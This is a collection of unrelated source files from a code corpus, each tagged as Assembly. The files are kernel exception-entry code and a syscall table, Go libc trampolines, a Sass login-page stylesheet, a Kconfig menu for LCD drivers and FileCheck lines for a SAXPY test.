ENTRY(nmi_handler)
add -4,sp
mov d0,(sp)
mov (TBR),d0
#ifdef CONFIG_SMP
add -4,sp
mov d0,(sp) # save d0(TBR)
movhu (NMIAGR),d0
and NMIAGR_GN,d0
lsr 0x2,d0
cmp CALL_FUNCTION_NMI_IPI,d0
bne nmi_not_smp_callfunc # if not call function, jump
# function call nmi ipi
add 4,sp # no need to store TBR
mov GxICR_DETECT,d0 # clear NMI request
movbu d0,(GxICR(CALL_FUNCTION_NMI_IPI))
movhu (GxICR(CALL_FUNCTION_NMI_IPI)),d0
and ~EPSW_NMID,epsw # enable NMI
mov (sp),d0 # restore d0
SAVE_ALL
call smp_nmi_call_function_interrupt[],0
RESTORE_ALL
nmi_not_smp_callfunc:
#ifdef CONFIG_KERNEL_DEBUGGER
cmp DEBUGGER_NMI_IPI,d0
bne nmi_not_debugger # if not kernel debugger NMI IPI, jump
# kernel debugger NMI IPI
add 4,sp # no need to store TBR
mov GxICR_DETECT,d0 # clear NMI
movbu d0,(GxICR(DEBUGGER_NMI_IPI))
movhu (GxICR(DEBUGGER_NMI_IPI)),d0
and ~EPSW_NMID,epsw # enable NMI
mov (sp),d0
SAVE_ALL
mov fp,d0 # arg 0: stacked register file
mov a2,d1 # arg 1: exception number
call debugger_nmi_interrupt[],0
RESTORE_ALL
nmi_not_debugger:
#endif /* CONFIG_KERNEL_DEBUGGER */
mov (sp),d0 # restore TBR to d0
add 4,sp
#endif /* CONFIG_SMP */
bra __common_exception_nonmi
###############################################################################
#
# General exception entry point
#
###############################################################################
ENTRY(__common_exception)
add -4,sp
mov d0,(sp)
#if defined(CONFIG_ERRATUM_NEED_TO_RELOAD_MMUCTR)
mov (MMUCTR),d0
mov d0,(MMUCTR)
#endif
__common_exception_aux:
mov (TBR),d0
and ~EPSW_NMID,epsw # turn NMIs back on if not NMI
or EPSW_IE,epsw
__common_exception_nonmi:
and 0x0000FFFF,d0 # turn the exception code into a vector
# table index
btst 0x00000007,d0
bne 1f
cmp 0x00000400,d0
bge 1f
SAVE_ALL # build the stack frame
mov (REG_D0,fp),a2 # get the exception number
mov (REG_ORIG_D0,fp),d0
mov d0,(REG_D0,fp)
mov -1,d0
mov d0,(REG_ORIG_D0,fp)
#ifdef CONFIG_GDBSTUB
#ifdef CONFIG_SMP
call gdbstub_busy_check[],0
and d0,d0 # check return value
beq 2f
#else /* CONFIG_SMP */
btst 0x01,(gdbstub_busy)
beq 2f
#endif /* CONFIG_SMP */
and ~EPSW_IE,epsw
mov fp,d0
mov a2,d1
call gdbstub_exception[],0 # gdbstub itself caused an exception
bra restore_all
2:
#endif /* CONFIG_GDBSTUB */
mov fp,d0 # arg 0: stacked register file
mov a2,d1 # arg 1: exception number
lsr 1,a2
mov (exception_table,a2),a2
calls (a2)
jmp ret_from_exception
1: pi # BUG() equivalent
###############################################################################
#
# Exception handler functions table
#
###############################################################################
.data
ENTRY(exception_table)
.rept 0x400>>1
.long uninitialised_exception
.endr
.previous
###############################################################################
#
# Change an entry in the exception table
# - D0 exception code, D1 handler
#
###############################################################################
ENTRY(set_excp_vector)
lsr 1,d0
add exception_table,d0
mov d1,(d0)
mov 4,d1
ret [],0
###############################################################################
#
# System call table
#
###############################################################################
.data
ENTRY(sys_call_table)
.long sys_restart_syscall /* 0 */
.long sys_exit
.long sys_fork
.long sys_read
.long sys_write
.long sys_open /* 5 */
.long sys_close
.long sys_waitpid
.long sys_creat
.long sys_link
.long sys_unlink /* 10 */
.long sys_execve
.long sys_chdir
.long sys_time
.long sys_mknod
.long sys_chmod /* 15 */
.long sys_lchown16
.long sys_ni_syscall /* old break syscall holder */
.long sys_stat
.long sys_lseek
.long sys_getpid /* 20 */
.long sys_mount
.long sys_oldumount
.long sys_setuid16
.long sys_getuid16
.long sys_stime /* 25 */
.long sys_ptrace
.long sys_alarm
.long sys_fstat
.long sys_pause
.long sys_utime /* 30 */
.long sys_ni_syscall /* old stty syscall holder */
.long sys_ni_syscall /* old gtty syscall holder */
.long sys_access
.long sys_nice
.long sys_ni_syscall /* 35 - old ftime syscall holder */
.long sys_sync
.long sys_kill
.long sys_rename
.long sys_mkdir
.long sys_rmdir /* 40 */
.long sys_dup
.long sys_pipe
.long sys_times
.long sys_ni_syscall /* old prof syscall holder */
.long sys_brk /* 45 */
.long sys_setgid16
.long sys_getgid16
.long sys_signal
.long sys_geteuid16
.long sys_getegid16 /* 50 */
.long sys_acct
.long sys_umount /* recycled never used phys() */
.long sys_ni_syscall /* old lock syscall holder */
.long sys_ioctl
.long sys_fcntl /* 55 */
.long sys_ni_syscall /* old mpx syscall holder */
.long sys_setpgid
.long sys_ni_syscall /* old ulimit syscall holder */
.long sys_ni_syscall /* old sys_olduname */
.long sys_umask /* 60 */
.long sys_chroot
.long sys_ustat
.long sys_dup2
.long sys_getppid
.long sys_getpgrp /* 65 */
.long sys_setsid
.long sys_sigaction
.long sys_sgetmask
.long sys_ssetmask
.long sys_setreuid16 /* 70 */
.long sys_setregid16
.long sys_sigsuspend
.long sys_sigpending
.long sys_sethostname
.long sys_setrlimit /* 75 */
.long sys_old_getrlimit
.long sys_getrusage
.long sys_gettimeofday
.long sys_settimeofday
.long sys_getgroups16 /* 80 */
.long sys_setgroups16
.long sys_old_select
.long sys_symlink
.long sys_lstat
.long sys_readlink /* 85 */
.long sys_uselib
.long sys_swapon
.long sys_reboot
.long sys_old_readdir
.long old_mmap /* 90 */
.long sys_munmap
.long sys_truncate
.long sys_ftruncate
.long sys_fchmod
.long sys_fchown16 /* 95 */
.long sys_getpriority
.long sys_setpriority
.long sys_ni_syscall /* old profil syscall holder */
.long sys_statfs
.long sys_fstatfs /* 100 */
.long sys_ni_syscall /* ioperm */
.long sys_socketcall
.long sys_syslog
.long sys_setitimer
.long sys_getitimer /* 105 */
.long sys_newstat
.long sys_newlstat
.long sys_newfstat
.long sys_ni_syscall /* old sys_uname */
.long sys_ni_syscall /* 110 - iopl */
.long sys_vhangup
.long sys_ni_syscall /* old "idle" system call */
.long sys_ni_syscall /* vm86old */
.long sys_wait4
.long sys_swapoff /* 115 */
.long sys_sysinfo
.long sys_ipc
.long sys_fsync
.long sys_sigreturn
.long sys_clone /* 120 */
.long sys_setdomainname
.long sys_newuname
.long sys_ni_syscall /* modify_ldt */
.long sys_adjtimex
.long sys_mprotect /* 125 */
.long sys_sigprocmask
.long sys_ni_syscall /* old "create_module" */
.long sys_init_module
.long sys_delete_module
.long sys_ni_syscall /* 130: old "get_kernel_syms" */
.long sys_quotactl
.long sys_getpgid
.long sys_fchdir
.long sys_bdflush
.long sys_sysfs /* 135 */
.long sys_personality
.long sys_ni_syscall /* reserved for afs_syscall */
.long sys_setfsuid16
.long sys_setfsgid16
.long sys_llseek /* 140 */
.long sys_getdents
.long sys_select
.long sys_flock
.long sys_msync
.long sys_readv /* 145 */
.long sys_writev
.long sys_getsid
.long sys_fdatasync
.long sys_sysctl
.long sys_mlock /* 150 */
.long sys_munlock
.long sys_mlockall
.long sys_munlockall
.long sys_sched_setparam
.long sys_sched_getparam /* 155 */
.long sys_sched_setscheduler
.long sys_sched_getscheduler
.long sys_sched_yield
.long sys_sched_get_priority_max
.long sys_sched_get_priority_min /* 160 */
.long sys_sched_rr_get_interval
.long sys_nanosleep
.long sys_mremap
.long sys_setresuid16
.long sys_getresuid16 /* 165 */
.long sys_ni_syscall /* vm86 */
.long sys_ni_syscall /* Old sys_query_module */
.long sys_poll
.long sys_ni_syscall /* was nfsservctl */
.long sys_setresgid16 /* 170 */
.long sys_getresgid16
.long sys_prctl
.long sys_rt_sigreturn
.long sys_rt_sigaction
.long sys_rt_sigprocmask /* 175 */
.long sys_rt_sigpending
.long sys_rt_sigtimedwait
.long sys_rt_sigqueueinfo
.long sys_rt_sigsuspend
.long sys_pread64 /* 180 */
.long sys_pwrite64
.long sys_chown16
.long sys_getcwd
.long sys_capget
.long sys_capset /* 185 */
.long sys_sigaltstack
.long sys_sendfile
.long sys_ni_syscall /* reserved for streams1 */
.long sys_ni_syscall /* reserved for streams2 */
.long sys_vfork /* 190 */
.long sys_getrlimit
.long sys_mmap_pgoff
.long sys_truncate64
.long sys_ftruncate64
.long sys_stat64 /* 195 */
.long sys_lstat64
.long sys_fstat64
.long sys_lchown
.long sys_getuid
.long sys_getgid /* 200 */
.long sys_geteuid
.long sys_getegid
.long sys_setreuid
.long sys_setregid
.long sys_getgroups /* 205 */
.long sys_setgroups
.long sys_fchown
.long sys_setresuid
.long sys_getresuid
.long sys_setresgid /* 210 */
.long sys_getresgid
.long sys_chown
.long sys_setuid
.long sys_setgid
.long sys_setfsuid /* 215 */
.long sys_setfsgid
.long sys_pivot_root
.long sys_mincore
.long sys_madvise
.long sys_getdents64 /* 220 */
.long sys_fcntl64
.long sys_ni_syscall /* reserved for TUX */
.long sys_ni_syscall
.long sys_gettid
.long sys_readahead /* 225 */
.long sys_setxattr
.long sys_lsetxattr
.long sys_fsetxattr
.long sys_getxattr
.long sys_lgetxattr /* 230 */
.long sys_fgetxattr
.long sys_listxattr
.long sys_llistxattr
.long sys_flistxattr
.long sys_removexattr /* 235 */
.long sys_lremovexattr
.long sys_fremovexattr
.long sys_tkill
.long sys_sendfile64
.long sys_futex /* 240 */
.long sys_sched_setaffinity
.long sys_sched_getaffinity
.long sys_ni_syscall /* sys_set_thread_area */
.long sys_ni_syscall /* sys_get_thread_area */
.long sys_io_setup /* 245 */
.long sys_io_destroy
.long sys_io_getevents
.long sys_io_submit
.long sys_io_cancel
.long sys_fadvise64 /* 250 */
.long sys_ni_syscall
.long sys_exit_group
.long sys_lookup_dcookie
.long sys_epoll_create
.long sys_epoll_ctl /* 255 */
.long sys_epoll_wait
.long sys_remap_file_pages
.long sys_set_tid_address
.long sys_timer_create
.long sys_timer_settime /* 260 */
.long sys_timer_gettime
.long sys_timer_getoverrun
.long sys_timer_delete
.long sys_clock_settime
.long sys_clock_gettime /* 265 */
.long sys_clock_getres
.long sys_clock_nanosleep
.long sys_statfs64
.long sys_fstatfs64
.long sys_tgkill /* 270 */
.long sys_utimes
.long sys_fadvise64_64
.long sys_ni_syscall /* sys_vserver */
.long sys_mbind
.long sys_get_mempolicy /* 275 */
.long sys_set_mempolicy
.long sys_mq_open
.long sys_mq_unlink
.long sys_mq_timedsend
.long sys_mq_timedreceive /* 280 */
.long sys_mq_notify
.long sys_mq_getsetattr
.long sys_kexec_load
.long sys_waitid
.long sys_ni_syscall /* 285 */ /* available */
.long sys_add_key
.long sys_request_key
.long sys_keyctl
.long sys_cacheflush
.long sys_ioprio_set /* 290 */
.long sys_ioprio_get
.long sys_inotify_init
.long sys_inotify_add_watch
.long sys_inotify_rm_watch
.long sys_migrate_pages /* 295 */
.long sys_openat
.long sys_mkdirat
.long sys_mknodat
.long sys_fchownat
.long sys_futimesat /* 300 */
.long sys_fstatat64
.long sys_unlinkat
.long sys_renameat
.long sys_linkat
.long sys_symlinkat /* 305 */
.long sys_readlinkat
.long sys_fchmodat
.long sys_faccessat
.long sys_pselect6
.long sys_ppoll /* 310 */
.long sys_unshare
.long sys_set_robust_list
.long sys_get_robust_list
.long sys_splice
.long sys_sync_file_range /* 315 */
.long sys_tee
.long sys_vmsplice
.long sys_move_pages
.long sys_getcpu
.long sys_epoll_pwait /* 320 */
.long sys_utimensat
.long sys_signalfd
.long sys_timerfd_create
.long sys_eventfd
.long sys_fallocate /* 325 */
.long sys_timerfd_settime
.long sys_timerfd_gettime
.long sys_signalfd4
.long sys_eventfd2
.long sys_epoll_create1 /* 330 */
.long sys_dup3
.long sys_pipe2
.long sys_inotify_init1
.long sys_preadv
.long sys_pwritev /* 335 */
.long sys_rt_tgsigqueueinfo
.long sys_perf_event_open
.long sys_recvmmsg
.long sys_setns
nr_syscalls=(.-sys_call_table)/4
| {
"language": "Assembly"
} |
// go run mkasm_darwin.go arm
// Code generated by the command above; DO NOT EDIT.
// +build go1.12
#include "textflag.h"
TEXT ·libc_getgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgroups(SB)
TEXT ·libc_setgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgroups(SB)
TEXT ·libc_wait4_trampoline(SB),NOSPLIT,$0-0
JMP libc_wait4(SB)
TEXT ·libc_accept_trampoline(SB),NOSPLIT,$0-0
JMP libc_accept(SB)
TEXT ·libc_bind_trampoline(SB),NOSPLIT,$0-0
JMP libc_bind(SB)
TEXT ·libc_connect_trampoline(SB),NOSPLIT,$0-0
JMP libc_connect(SB)
TEXT ·libc_socket_trampoline(SB),NOSPLIT,$0-0
JMP libc_socket(SB)
TEXT ·libc_getsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockopt(SB)
TEXT ·libc_setsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsockopt(SB)
TEXT ·libc_getpeername_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpeername(SB)
TEXT ·libc_getsockname_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockname(SB)
TEXT ·libc_shutdown_trampoline(SB),NOSPLIT,$0-0
JMP libc_shutdown(SB)
TEXT ·libc_socketpair_trampoline(SB),NOSPLIT,$0-0
JMP libc_socketpair(SB)
TEXT ·libc_recvfrom_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvfrom(SB)
TEXT ·libc_sendto_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendto(SB)
TEXT ·libc_recvmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvmsg(SB)
TEXT ·libc_sendmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendmsg(SB)
TEXT ·libc_kevent_trampoline(SB),NOSPLIT,$0-0
JMP libc_kevent(SB)
TEXT ·libc___sysctl_trampoline(SB),NOSPLIT,$0-0
JMP libc___sysctl(SB)
TEXT ·libc_utimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_utimes(SB)
TEXT ·libc_futimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_futimes(SB)
TEXT ·libc_fcntl_trampoline(SB),NOSPLIT,$0-0
JMP libc_fcntl(SB)
TEXT ·libc_poll_trampoline(SB),NOSPLIT,$0-0
JMP libc_poll(SB)
TEXT ·libc_madvise_trampoline(SB),NOSPLIT,$0-0
JMP libc_madvise(SB)
TEXT ·libc_mlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlock(SB)
TEXT ·libc_mlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlockall(SB)
TEXT ·libc_mprotect_trampoline(SB),NOSPLIT,$0-0
JMP libc_mprotect(SB)
TEXT ·libc_msync_trampoline(SB),NOSPLIT,$0-0
JMP libc_msync(SB)
TEXT ·libc_munlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlock(SB)
TEXT ·libc_munlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlockall(SB)
TEXT ·libc_getattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_getattrlist(SB)
TEXT ·libc_pipe_trampoline(SB),NOSPLIT,$0-0
JMP libc_pipe(SB)
TEXT ·libc_getxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_getxattr(SB)
TEXT ·libc_fgetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fgetxattr(SB)
TEXT ·libc_setxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_setxattr(SB)
TEXT ·libc_fsetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsetxattr(SB)
TEXT ·libc_removexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_removexattr(SB)
TEXT ·libc_fremovexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fremovexattr(SB)
TEXT ·libc_listxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_listxattr(SB)
TEXT ·libc_flistxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_flistxattr(SB)
TEXT ·libc_setattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_setattrlist(SB)
TEXT ·libc_kill_trampoline(SB),NOSPLIT,$0-0
JMP libc_kill(SB)
TEXT ·libc_ioctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_ioctl(SB)
TEXT ·libc_sendfile_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendfile(SB)
TEXT ·libc_access_trampoline(SB),NOSPLIT,$0-0
JMP libc_access(SB)
TEXT ·libc_adjtime_trampoline(SB),NOSPLIT,$0-0
JMP libc_adjtime(SB)
TEXT ·libc_chdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_chdir(SB)
TEXT ·libc_chflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_chflags(SB)
TEXT ·libc_chmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_chmod(SB)
TEXT ·libc_chown_trampoline(SB),NOSPLIT,$0-0
JMP libc_chown(SB)
TEXT ·libc_chroot_trampoline(SB),NOSPLIT,$0-0
JMP libc_chroot(SB)
TEXT ·libc_close_trampoline(SB),NOSPLIT,$0-0
JMP libc_close(SB)
TEXT ·libc_dup_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup(SB)
TEXT ·libc_dup2_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup2(SB)
TEXT ·libc_exchangedata_trampoline(SB),NOSPLIT,$0-0
JMP libc_exchangedata(SB)
TEXT ·libc_exit_trampoline(SB),NOSPLIT,$0-0
JMP libc_exit(SB)
TEXT ·libc_faccessat_trampoline(SB),NOSPLIT,$0-0
JMP libc_faccessat(SB)
TEXT ·libc_fchdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchdir(SB)
TEXT ·libc_fchflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchflags(SB)
TEXT ·libc_fchmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmod(SB)
TEXT ·libc_fchmodat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmodat(SB)
TEXT ·libc_fchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchown(SB)
TEXT ·libc_fchownat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchownat(SB)
TEXT ·libc_flock_trampoline(SB),NOSPLIT,$0-0
JMP libc_flock(SB)
TEXT ·libc_fpathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_fpathconf(SB)
TEXT ·libc_fsync_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsync(SB)
TEXT ·libc_ftruncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_ftruncate(SB)
TEXT ·libc_getdtablesize_trampoline(SB),NOSPLIT,$0-0
JMP libc_getdtablesize(SB)
TEXT ·libc_getegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getegid(SB)
TEXT ·libc_geteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_geteuid(SB)
TEXT ·libc_getgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgid(SB)
TEXT ·libc_getpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgid(SB)
TEXT ·libc_getpgrp_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgrp(SB)
TEXT ·libc_getpid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpid(SB)
TEXT ·libc_getppid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getppid(SB)
TEXT ·libc_getpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpriority(SB)
TEXT ·libc_getrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrlimit(SB)
TEXT ·libc_getrusage_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrusage(SB)
TEXT ·libc_getsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsid(SB)
TEXT ·libc_getuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getuid(SB)
TEXT ·libc_issetugid_trampoline(SB),NOSPLIT,$0-0
JMP libc_issetugid(SB)
TEXT ·libc_kqueue_trampoline(SB),NOSPLIT,$0-0
JMP libc_kqueue(SB)
TEXT ·libc_lchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_lchown(SB)
TEXT ·libc_link_trampoline(SB),NOSPLIT,$0-0
JMP libc_link(SB)
TEXT ·libc_linkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_linkat(SB)
TEXT ·libc_listen_trampoline(SB),NOSPLIT,$0-0
JMP libc_listen(SB)
TEXT ·libc_mkdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdir(SB)
TEXT ·libc_mkdirat_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdirat(SB)
TEXT ·libc_mkfifo_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkfifo(SB)
TEXT ·libc_mknod_trampoline(SB),NOSPLIT,$0-0
JMP libc_mknod(SB)
TEXT ·libc_open_trampoline(SB),NOSPLIT,$0-0
JMP libc_open(SB)
TEXT ·libc_openat_trampoline(SB),NOSPLIT,$0-0
JMP libc_openat(SB)
TEXT ·libc_pathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_pathconf(SB)
TEXT ·libc_pread_trampoline(SB),NOSPLIT,$0-0
JMP libc_pread(SB)
TEXT ·libc_pwrite_trampoline(SB),NOSPLIT,$0-0
JMP libc_pwrite(SB)
TEXT ·libc_read_trampoline(SB),NOSPLIT,$0-0
JMP libc_read(SB)
TEXT ·libc_readlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlink(SB)
TEXT ·libc_readlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlinkat(SB)
TEXT ·libc_rename_trampoline(SB),NOSPLIT,$0-0
JMP libc_rename(SB)
TEXT ·libc_renameat_trampoline(SB),NOSPLIT,$0-0
JMP libc_renameat(SB)
TEXT ·libc_revoke_trampoline(SB),NOSPLIT,$0-0
JMP libc_revoke(SB)
TEXT ·libc_rmdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_rmdir(SB)
TEXT ·libc_lseek_trampoline(SB),NOSPLIT,$0-0
JMP libc_lseek(SB)
TEXT ·libc_select_trampoline(SB),NOSPLIT,$0-0
JMP libc_select(SB)
TEXT ·libc_setegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setegid(SB)
TEXT ·libc_seteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_seteuid(SB)
TEXT ·libc_setgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgid(SB)
TEXT ·libc_setlogin_trampoline(SB),NOSPLIT,$0-0
JMP libc_setlogin(SB)
TEXT ·libc_setpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpgid(SB)
TEXT ·libc_setpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpriority(SB)
TEXT ·libc_setprivexec_trampoline(SB),NOSPLIT,$0-0
JMP libc_setprivexec(SB)
TEXT ·libc_setregid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setregid(SB)
TEXT ·libc_setreuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setreuid(SB)
TEXT ·libc_setrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_setrlimit(SB)
TEXT ·libc_setsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsid(SB)
TEXT ·libc_settimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_settimeofday(SB)
TEXT ·libc_setuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setuid(SB)
TEXT ·libc_symlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlink(SB)
TEXT ·libc_symlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlinkat(SB)
TEXT ·libc_sync_trampoline(SB),NOSPLIT,$0-0
JMP libc_sync(SB)
TEXT ·libc_truncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_truncate(SB)
TEXT ·libc_umask_trampoline(SB),NOSPLIT,$0-0
JMP libc_umask(SB)
TEXT ·libc_undelete_trampoline(SB),NOSPLIT,$0-0
JMP libc_undelete(SB)
TEXT ·libc_unlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlink(SB)
TEXT ·libc_unlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlinkat(SB)
TEXT ·libc_unmount_trampoline(SB),NOSPLIT,$0-0
JMP libc_unmount(SB)
TEXT ·libc_write_trampoline(SB),NOSPLIT,$0-0
JMP libc_write(SB)
TEXT ·libc_mmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_mmap(SB)
TEXT ·libc_munmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_munmap(SB)
TEXT ·libc_gettimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_gettimeofday(SB)
TEXT ·libc_fstat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstat(SB)
TEXT ·libc_fstatat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatat(SB)
TEXT ·libc_fstatfs_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatfs(SB)
TEXT ·libc_getfsstat_trampoline(SB),NOSPLIT,$0-0
JMP libc_getfsstat(SB)
TEXT ·libc_lstat_trampoline(SB),NOSPLIT,$0-0
JMP libc_lstat(SB)
TEXT ·libc_stat_trampoline(SB),NOSPLIT,$0-0
JMP libc_stat(SB)
TEXT ·libc_statfs_trampoline(SB),NOSPLIT,$0-0
JMP libc_statfs(SB)
| {
"language": "Assembly"
} |
.data
.globl __environ
.type __environ,%object
__environ:
.dc.a 0
.size __environ, .-__environ
.weak _environ
.globl _environ
.set _environ, __environ
.weak environ
.set environ, __environ
| {
"language": "Assembly"
} |
@mixin background-image-with-ms($image)
@include background-image($image) // Compass default version, for everything but IE 10.
background-image: -ms-#{$image} // Vendor prefixes for IE 10.
#login
min-height: 100%
padding-bottom: 45px
#shop-img
z-index: 1
position: absolute
margin: 0 auto
width: 69.5px
left: 0
right: 0
#login-header
padding-top: 40px
margin-bottom: 30px
color: #6d6d6d
h1, h4
margin: 0
padding: 0
#login-panel
margin: 0 auto
width: 500px
.form-control
height: inherit !important
padding: 10px 8px !important
@media (max-width: $screen-phone)
width: 90%
.panel
@include border-radius(0)
@include box-shadow(0 1px 3px rgba(0,0,0,0.30))
.panel-footer
height: inherit
margin: 0 -20px -20px
.flip-container
height: 420px
margin-top: 115px
@include perspective(1000px)
transform-style: preserve-3d
//@include animate(fadeInDown, 0.3s)
&.flip
.flipper
@include rotateY(180deg)
.back
@include backface-visibility(visible)
.flipper
position: relative
transform-style: preserve-3d
@include transition-duration(0.6s)
@include transform-style
.front, .back
width: 100%
padding: 40px
position: absolute
transition: 0.6s
transform-style: preserve-3d
top: 0
@include backface-visibility(hidden)
@include left(0)
.front
@include rotateY(0)
z-index: 2
.back
display: none
z-index: 1
@include rotateY(180deg)
#shop_name, #reset_name, #reset_confirm_name, #forgot_name, #forgot_confirm_name
text-align: center
font-family: $font-family-sans-serif
#login_form
padding-top: 15px
#remind-me
margin-top: 0
#login-footer
margin-top: 20px
a
color: #A0AAB5
| {
"language": "Assembly"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* Copyright (C) 2015 Google, Inc
*/
#include <common.h>
| {
"language": "Assembly"
} |
#
# For a description of the syntax of this configuration file,
# see Documentation/kbuild/kconfig-language.txt.
#
# Auxiliary display drivers configuration.
#
menu "Auxiliary Display support"
depends on PARPORT
config KS0108
tristate "KS0108 LCD Controller"
depends on PARPORT_PC
default n
---help---
If you have a LCD controlled by one or more KS0108
controllers, say Y. You will need also another more specific
driver for your LCD.
Depends on Parallel Port support. If you say Y at
parport, you will be able to compile this as a module (M)
and built-in as well (Y).
To compile this as a module, choose M here:
the module will be called ks0108.
If unsure, say N.
config KS0108_PORT
hex "Parallel port where the LCD is connected"
depends on KS0108
default 0x378
---help---
The address of the parallel port where the LCD is connected.
The first standard parallel port address is 0x378.
The second standard parallel port address is 0x278.
The third standard parallel port address is 0x3BC.
You can specify a different address if you need.
If you don't know what I'm talking about, load the parport module,
and execute "dmesg" or "cat /proc/ioports". You can see there how
many parallel ports are present and which address each one has.
Usually you only need to use 0x378.
If you compile this as a module, you can still override this
using the module parameters.
config KS0108_DELAY
int "Delay between each control writing (microseconds)"
depends on KS0108
default "2"
---help---
Amount of time the ks0108 should wait between each control write
to the parallel port.
If your driver seems to miss random writings, increment this.
If you don't know what I'm talking about, ignore it.
If you compile this as a module, you can still override this
value using the module parameters.
config CFAG12864B
tristate "CFAG12864B LCD"
depends on X86
depends on FB
depends on KS0108
select FB_SYS_FILLRECT
select FB_SYS_COPYAREA
select FB_SYS_IMAGEBLIT
select FB_SYS_FOPS
default n
---help---
If you have a Crystalfontz 128x64 2-color LCD, cfag12864b Series,
say Y. You also need the ks0108 LCD Controller driver.
For help about how to wire your LCD to the parallel port,
check Documentation/auxdisplay/cfag12864b
Depends on the x86 arch and the framebuffer support.
The LCD framebuffer driver can be attached to a console.
It will work fine. However, you can't attach it to the fbdev driver
of the xorg server.
To compile this as a module, choose M here:
the modules will be called cfag12864b and cfag12864bfb.
If unsure, say N.
config CFAG12864B_RATE
int "Refresh rate (hertz)"
depends on CFAG12864B
default "20"
---help---
Refresh rate of the LCD.
As the LCD is not memory mapped, the driver has to make the work by
software. This means you should be careful setting this value higher.
If your CPUs are really slow or you feel the system is slowed down,
decrease the value.
Be careful modifying this value to a very high value:
You can freeze the computer, or the LCD maybe can't draw as fast as you
are requesting.
If you don't know what I'm talking about, ignore it.
If you compile this as a module, you can still override this
value using the module parameters.
endmenu
| {
"language": "Assembly"
} |
CHECK: SAXPY (functor method)
CHECK-NEXT: 2 * 1 + 1 = 3
CHECK-NEXT: 2 * 2 + 1 = 5
CHECK-NEXT: 2 * 3 + 1 = 7
CHECK-NEXT: 2 * 4 + 1 = 9
CHECK-NEXT: SAXPY (placeholder method)
CHECK-NEXT: 2 * 1 + 1 = 3
